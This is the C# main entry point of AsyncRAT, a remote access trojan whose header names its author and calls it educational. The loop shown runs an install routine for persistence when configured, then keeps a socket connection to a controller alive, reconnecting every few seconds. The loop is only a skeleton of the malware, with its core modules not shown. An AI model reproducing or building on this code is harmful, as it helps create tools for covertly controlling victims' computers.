using System.Threading; using Client.Sockets; using Client.Install; // │ Author : NYAN CAT // │ Name : AsyncRAT // Simple Socket // Contact Me : https://github.com/NYAN-x-CAT // This program Is distributed for educational purposes only. namespace Client { class Program { static void Main() { if (Settings.Install == "true") NormalStartup.Install(); ClientSocket.InitializeClient(); while (true) { if (ClientSocket.Connected == false) ClientSocket.Reconnect(); Thread.Sleep(2500); } } } }